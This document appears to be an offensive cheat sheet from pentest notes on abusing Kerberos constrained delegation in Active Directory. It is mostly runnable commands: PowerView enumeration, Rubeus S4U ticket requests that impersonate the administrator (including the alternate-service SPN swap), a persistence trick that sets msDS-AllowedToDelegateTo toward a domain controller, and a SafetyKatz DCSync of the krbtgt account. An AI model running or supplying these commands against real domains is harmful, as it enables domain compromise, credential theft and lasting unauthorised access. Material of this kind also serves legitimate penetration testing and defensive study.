constrained-delegation

Constrained Delegation

Methodology

1. Enumerate users/computers which have constrained delegation enabled (Ignore domain controllers).

2. Understand what you can acces if you compromise the user/machine by looking at msDS-AllowedToDelegateTo.

3. Impersonate the user or have SYSTEM on the constrained delegation machine.

4. Impersonate the high value target and abuse the lack of SPN validation.

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerView

Find objects with constrained delegation enabled:

# Users
Get-DomainUser –TrustedToAuth

# Computers
Get-DomainComputer –TrustedToAuth

Binaries

[!INFO] Remember to follow the Binaries methodology

Rubeus

Use the S4U module to inject the ticket to the current session:

Rubeus.exe s4u /user:constrained_user /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/usmssql.us.contoso.local /domain:us.contoso.local /ptt

Abuse the lack of verification to query another SPN:

Rubeus.exe s4u /user:constrained_user /aes256:b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335 /impersonateuser:administrator /msdsspn:CIFS/usmssql.us.contoso.local /altservice:HTTP /domain:us.contoso.local /ptt

After injecting the ticket, we can access us-mssql:

winrs -r:us-mssql cmd.exe

Persistence - msDS-AllowedToDelegateTo

Powershell

Powerview

Set-DomainObject -Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/us-dc.us.techcorp.local"}
Set-DomainObject -SamAccountName devuser1 -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser –TrustedToAuth

Binaries

Rubeus

Rubeus.exe hash /password:Password@123! /user:devuser /domain:us.techcorp.local
Rubeus.exe s4u /user:devuser /rc4:539259E25A0361EC4A227DD9894719F6 /impersonateuser:administrator /msdsspn:ldap/us-dc.us.techcorp.local /domain:us.techcorp.local /ptt
SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"